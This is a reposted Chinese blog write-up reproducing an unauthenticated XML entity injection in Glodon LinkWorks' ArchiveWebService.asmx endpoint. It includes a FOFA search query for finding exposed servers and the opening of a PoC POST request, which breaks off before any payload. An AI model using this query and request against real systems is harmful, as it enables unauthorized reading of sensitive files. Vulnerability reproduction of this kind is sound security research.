热门标签
热门文章
- 1【C语言】学生宿舍信息管理系统_学生宿舍管理系统c语言
- 2ThreeJS:光线投射与3D场景交互_getraycastersbyobject3d
- 3深入解析 GPT-4o mini:强大功能与创新应用_gpt-4o mini技术详解
- 4深度学习论文精读[8]:ParseNet
- 5音频质量评价体系那些事
- 6推荐项目:VoxPoser——基于语言模型的3D值图进行机器人操作
- 7【Spring云原生】Spring Batch:海量数据高并发任务处理!数据处理纵享新丝滑!事务管理机制+并行处理+实例应用讲解_springbatch多线程处理数据
- 8链表基础知识(一、单链表、头插、尾插、头删、尾删、查找、删除、插入、求表长,合并链表)_单链表的尾插
- 9ubuntu22.04+ROS2 humble+Qt5.12.9+QtCreator11.0环境下,ROS搭配Qt进行GUI界面开发配置过程
- 102024测试工程师核心软技能「情绪管理」,2024最新软件测试算法相关面试大_测试工程师面试 软技能
当前位置: article > 正文
广联达Linkworks ArchiveWebService XML实体注入漏洞复现_广联达oa接口archivewebservice存在xml实体注入漏洞
作者:你好赵伟 | 2024-08-04 14:20:35
赞
踩
广联达oa接口archivewebservice存在xml实体注入漏洞
0x01 产品简介
广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。
0x02 漏洞概述
广联达 LinkWorks /GB/LK/Document/ArchiveService/ArchiveWebService.asmx接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。
0x03 复现环境
FOFA:
body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"
0x04 漏洞复现
PoC
- POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1
- Host:
- Content-Type: text/xml; charset=utf-8
- Content-Length: length
- SOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebServi
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/你好赵伟/article/detail/928217
推荐阅读
相关标签
